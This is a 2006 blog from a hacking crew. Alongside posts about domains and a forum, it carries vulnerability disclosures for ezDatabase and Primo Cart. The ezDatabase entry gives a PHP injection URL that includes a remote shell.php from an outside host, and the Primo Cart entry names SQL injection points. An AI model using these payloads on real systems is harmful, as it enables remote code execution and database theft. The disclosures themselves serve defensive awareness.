by r0t,der4444,cembo,VietMafia

Tuesday, January 17, 2006

just view..

I wasnt more than week in .net and i see that xaPridel had posted some 0-day exploitz without public re-publishing.
So, with public stuff i hope i will be back in this blog after 1-2 weeks ....
Also i will give in board some good stuff .
take care and stay tuned:} with Pridels Sec Crew.

Saturday, January 14, 2006

ezDatabase 2.0 and below

ezDatabase 2.0 and below
=========================================
www.ezdatabase.org
"ezDatabase is the foundation for your online databases. It is a powerful web based application that allows even non-technical users to create online databases for their website. ezDatabase will do the hard work while you concentrate on building the databases you want."

______________________________________________
This vulnerability was first disclosed at:
www.unsecured-systems.com/forum/
By Pridels Team: pridels.blogspot.com

______________________________________________
Details:
This application insecurely uses variables in several ways.
Example:
visitorupload.php?db_id=;phpinfo()
visitorupload.php?db_id=;include(_GET[test])&test=http://www.unsecured-systems.com/forum/shell.php

registered_globals = on OR off

Solution:
Rewrite the application to follow the guidelines of the PHP Security Consortium

At this time there are several more vulnerabilites that have only been disclosed at:
www.unsecured-systems.com/forum/

Tuesday, January 10, 2006

new domains....

I add yesterday some new domains, cauz r00t.it is for some reasons on air and webmoney-exchange.com isnt very good domain for us.
so i think main domain can be also :

UNSECURED-SYSTEMS.com
and some bonnus domains

r-0-0-t.net
and
r0t.in

cembo can do changes by forum and set for now unsecured-systems.com as main domain.

keep workin!

Monday, January 09, 2006

r0t is here....

Hi guys i read comments , that my buddys ,friends are worry abot me.
Of course im alive , just dont have any connect to internet.
About our project, this blog isnt dead and will not be dead, just for some time i will be very inactive poster here, in my place can be der4444 or cembo or RaZbh .
About r00t.it the domain is still in air when i will have more oportunities in internet and normal connection i will resolve that problem.
cembo and xpridel is admins on board , the board is empty but i hope after this post it will start to be an normal board , with great stuff for many level members, hackers,crackers,testers,programmers all those who wanna learn and share they knowlegde from whole globe.
board you can found on www.webmoney-exchange.com/forum

about my problems and error´s from real life, nobody must throw away or overwrite they hd´s cauz i had some problems.

To my team guys: dont stop workin, i will be back!

r0t

Monday, January 02, 2006

Primo Cart SQL inj.

Primo Cart SQL inj.

Vuln. discovered by : r0t
Date: 2 jan. 2006
vendor:www.primoplace.com/primo-cart.htm
affected version:1.0 and prior


Product Description:

Primo Cart is a fully customizable turnkey shopping cart solution that enables any novice to advance level merchant to execute and manage their very own storefront fast and easy. The administration area interface is design with CSS for a clean look/feel and new AJAX technology for fast product management made easy. Coupled with the robust Smarty template engine, changes to the look/feel can be performed directly via FTP. Backend by MySQL and optimized for fast product querying. Supports Authorize.net and dynamic shipping cost lookup via UPS Online Tools, unlimited products, unlimited category nesting, unlimited custom fields, options/variances, product images, product rating/reviews, and unique category meta tags. The advance product import tool takes in a CSV file for mass imports. Primo cart offers free updates and community support to keep your cart tuned and in shape.


Vuln. Description:

Primo Cart contains a flaw that allows a remote sql injection attacks.Input passed to the "q" parameter in "search.php" and "email" parameter in "user.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

poc.

/user.php?email=[SQL]&action=send-password-now
/search.php?action=search&q=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

 
Copyright (c) 2006 Pridels Sec Crew